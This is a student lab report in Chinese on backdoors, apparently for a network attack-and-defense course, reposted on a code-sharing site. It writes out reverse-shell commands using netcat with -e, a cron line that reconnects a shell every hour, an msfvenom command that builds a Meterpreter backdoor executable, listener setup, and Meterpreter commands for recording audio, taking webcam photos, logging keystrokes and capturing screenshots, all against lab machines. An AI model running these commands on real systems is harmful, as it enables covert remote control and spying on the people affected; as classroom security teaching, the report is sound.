码迷,mamicode.com
首页 > 其他好文 > 详细

20165221 《网络对抗技术》EXP2:后门原理与实践

时间:2019-03-23 17:27:41      阅读:144      评论:0      收藏:0      [点我收藏+]

标签:任务计划   任务   安装   获取   msf   试验   payload   查看本机   相关   

20165221 《网络对抗技术》EXP2:后门原理与实践

实验任务

  • 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分)
  • 任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分)

  • 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

  • 任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

    具体实验操作

    任务一:Windows下获得Linux Shell

  • 在Windows下使用ipconfig查看本机IP
    技术图片

  • 使用ncat.exe程序监听本机的5221端口:
    技术图片
  • 在虚拟机中,使用nc指令的-e选项反向连接Windows主机的5221端口:
    技术图片
  • 成功获得Kali的shell:
    技术图片

    任务二:Linux下获得Windows Shell

  • 在Kali环境中使用ifconfig查看IP:
    技术图片
  • 使用nc指令监听5221端口:
    技术图片
  • 在Windows下,使用ncat.exe程序的-e选项项反向连接Kali主机的5221端口:
    技术图片
  • Kali下可以看到Windows的命令提示,可以输入Windows命令:
    技术图片
  • 在windows下监听5221端口

任务三:使用nc传输数据

  • 在Windows下监听5221端口:ncat.exe -l 5221
  • kali下连接到Windows的5221端口
  • 进行数据传输
    技术图片

  • crontab -e指令编辑一条定时任务
  • 在最后一行添加53 * * * * /bin/netcat 192.168.75.129 -e /bin/sh,意思是在每个小时的第53分钟反向连接Windows主机的5221端口:
  • * * * *的意思
    技术图片
  • 当时间到了以后,打开命令行,会发现已经获得了kali的shell,可以输入指令查看具体信息
    技术图片

    任务五:使用socat获取主机操作Shell, 任务计划启动

  • socatncat的增强版,它使用的格式是socat [options] <address> <address>,其中两个address是必选项,而options 是可选项。
    技术图片
    技术图片
    技术图片

使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 输入指令,生成后门程序 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.75.129 LPORT=5221 -f exe > 20165221_backdoor.exe
    技术图片
  • 通过nc指令将生成的后门程序送到windows主机上:
    技术图片
  • 在kali中使用msfconsole指令进入msf控制台,启用监听模块,并进行相关的配置:
    1. use exploit/multi/handler(使用监听模块,设置payload)
    2. set payload windows/meterpreter/reverse_tcp
      (使用和生成后门程序时相同的payload)
      3.set LHOST 192.168.75.128
    3. set LPORT 5221
  • 运行Windows下的后门程序:
    技术图片

  • 此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:
    技术图片

    使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等,并尝试提权

  • 使用命令record_mic可以获得一段音频(持续1秒,路径自动生成)
    技术图片
  • 使用命令webcam_snap可以用摄像头进行拍照
    技术图片

  • 在kali中,keyscan_start开始记录击键记录,到win7的cmd中,任意输入,再在kali中输入keyscan_dump获取击键记录
    技术图片
  • 使用命令screenshot对当前的win7进行屏幕截屏
    技术图片

    实践基础问题问答

    (1)列举你能想到的一个后门进入到你系统中的方式?
比如我在下载一些软件时,到第三方源去下载,可能安装包中已经被设定了后门,一旦安装成功,后门就可以进入

(2)列举你知道的后门的启动的方式

win中是后门伴随着绑定的软件二一起启动
linux中是可以用corn启动

(3)Meterpreter有哪些给你映像深刻的功能?

实验中做到的截取屏幕和获取你的敲击键盘的内容,给我印象最深

(4)如何发现自己的系统有没有被安装后门

通过杀毒软件来查找

实验总结

这次的实验较第一次试验复杂一点,但是还是挺有趣的,特别是做到后面通过指令操控,获取截屏,键入等信息时,自己对后门的理解也有了加深,在日常的电脑使用中,也会更加小心。

20165221 《网络对抗技术》EXP2:后门原理与实践

标签:任务计划   任务   安装   获取   msf   试验   payload   查看本机   相关   

原文地址:https://www.cnblogs.com/0630tx/p/10575367.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!